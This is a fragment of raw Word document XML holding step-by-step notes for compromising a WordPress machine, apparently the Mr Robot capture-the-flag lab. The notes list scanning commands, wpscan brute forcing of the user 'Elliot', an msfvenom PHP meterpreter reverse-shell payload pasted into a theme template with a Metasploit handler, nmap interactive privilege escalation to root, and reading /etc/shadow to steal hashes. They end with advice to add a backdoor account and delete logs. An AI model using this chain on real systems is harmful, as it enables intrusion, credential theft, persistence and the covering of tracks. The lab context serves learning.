          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
          </w:rPr>
          <w:t>http://10.10.10.10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- scans the website looking for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Analyse all info returned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007A4BC9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Wafw00f </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="007A4BC9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
          </w:rPr>
          <w:t>http://10.10.10.10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:tab/>
        <w:t>- detect if there is a web app firewall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4BC9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A4BC9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00CF6AEE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
          </w:rPr>
          <w:t>http://10.10.10.10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A4BC9">
        <w:t>- double check for directories</w:t>
      </w:r>
      <w:r>
        <w:t>. If it doesn’t work, maybe use a bigger wordlist. Can take hours.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Find a txt file in robots.txt. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>download</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and save. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF4EBF">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Sort </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>fsocity.dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF4EBF">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF4EBF">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>uniq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF4EBF">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; wordlist.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>- This can be used as a wordlist for Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00214E0E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00214E0E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00214E0E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00214E0E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00214E0E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
          </w:rPr>
          <w:t>http://10.10.10.10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00214E0E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> --enumerate u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>- scan the WordPress site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F72099" w:rsidRPr="00F72099" w:rsidRDefault="00F72099" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F72099">
        <w:t>Navigate to the WordPress login page</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00F72099" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F72099">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>WordPress ERROR: Invalid Username</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- helps you identify a user account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F72099" w:rsidRDefault="00F72099" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open ZAP – give it the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IP. Intercept the http traffic. </w:t>
      </w:r>
      <w:r w:rsidR="00D5781C">
        <w:t xml:space="preserve">Right click – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D5781C">
        <w:t>fuzzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D5781C">
        <w:t>. Add payloads. Start by adding the wordlist.txt created earlier to fuzz the site. Sort through the result at the bottom screen. Sort them by column headers to see anything different. The username ‘Elliot” returns a different http response. It would now be possible to fuzz the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5781C" w:rsidRDefault="00D5781C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go back to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and run another brute force method.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5781C" w:rsidRDefault="00D5781C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5781C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D5781C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D5781C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D5781C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00D5781C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
          </w:rPr>
          <w:t>http://10.10.10.10/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D5781C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> --wordlist wordlist.txt –username </w:t>
      </w:r>
      <w:r w:rsidR="00B45F7D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Elliot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45F7D" w:rsidRDefault="00B45F7D" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This runs a brute force attack using Elliot as the username. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45F7D" w:rsidRDefault="00B45F7D" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log in to WP using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>elliot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as the username and the password identified from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0A17" w:rsidRPr="004E0A17" w:rsidRDefault="004E0A17" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004E0A17">
        <w:t xml:space="preserve">Browse through every option and page to find somewhere to </w:t>
      </w:r>
      <w:r>
        <w:t>get code to run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0A17" w:rsidRDefault="004E0A17" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Found a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> page under Themes &gt; 404 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Not</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45F7D" w:rsidRDefault="004E0A17" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Google search “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> web shells”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> by pen test monkey.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0A17" w:rsidRDefault="004E0A17" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> –p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">=&lt;my IP&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444 –f raw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0A17" w:rsidRDefault="004E0A17" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This creates the payload. Paste it into the template to replace the old one. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F0AE9" w:rsidRDefault="000F0AE9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0A17" w:rsidRDefault="004E0A17" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0A17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Use multi/handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0A17" w:rsidRDefault="004E0A17" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Set payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004E0A17" w:rsidRDefault="004E0A17" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> My IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F0AE9" w:rsidRDefault="000F0AE9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F0AE9" w:rsidRDefault="000F0AE9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F0AE9" w:rsidRDefault="000F0AE9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go and visit a page on WP and wait for the script to kick off and it will open remote shell. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F0AE9" w:rsidRPr="000F0AE9" w:rsidRDefault="000F0AE9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0AE9">
        <w:t>Upgrade the shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F0AE9" w:rsidRDefault="000F0AE9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F0AE9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Python –c ‘import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F0AE9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F0AE9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000F0AE9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F0AE9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000F0AE9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“bin/bash”)’ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F0AE9" w:rsidRDefault="000F0AE9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Attempt Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F0AE9" w:rsidRDefault="000F0AE9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Find / -perm –u=s –type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F0AE9" w:rsidRDefault="000F0AE9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Have a look at the output and try and find things you can run. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F0AE9" w:rsidRDefault="00D56524" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nmap can run as ROOT. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D56524" w:rsidRDefault="00D56524" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/bin/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> –interactive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D56524" w:rsidRDefault="00D56524" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>!cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/shadow</w:t>
      </w:r>
      <w:r w:rsidR="008C081B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="008C081B">
        <w:t>this is now viewable. Can steal hashes of all users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C081B" w:rsidRDefault="008C081B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008C081B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>!/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- this didn’t work properly, notice the $ sign.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C081B" w:rsidRDefault="008C081B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008C081B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>!/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C081B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- this worked! Run </w:t>
      </w:r>
      <w:r w:rsidRPr="008C081B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and see </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C081B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>euid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C081B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C081B" w:rsidRDefault="008C081B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C081B" w:rsidRPr="008C081B" w:rsidRDefault="008C081B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now, it’s time to add a user account for continued access. Also start deleting logs. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C081B" w:rsidRPr="008C081B" w:rsidRDefault="008C081B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D5781C" w:rsidRDefault="00D5781C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F72099" w:rsidRDefault="00F72099" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F72099" w:rsidRDefault="00F72099" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F72099" w:rsidRDefault="00F72099" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F72099" w:rsidRDefault="00F72099" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F720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2F7958"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF7E9D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BE6369"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20E20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5813CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F2CE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78C45A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9800C2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AC2A27"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7B08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544162"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2AFED9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86335F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1DDCE1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BF171F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E6ED3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685E3299"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE063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1109B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BEE4A2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086C88"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5445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8"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8">
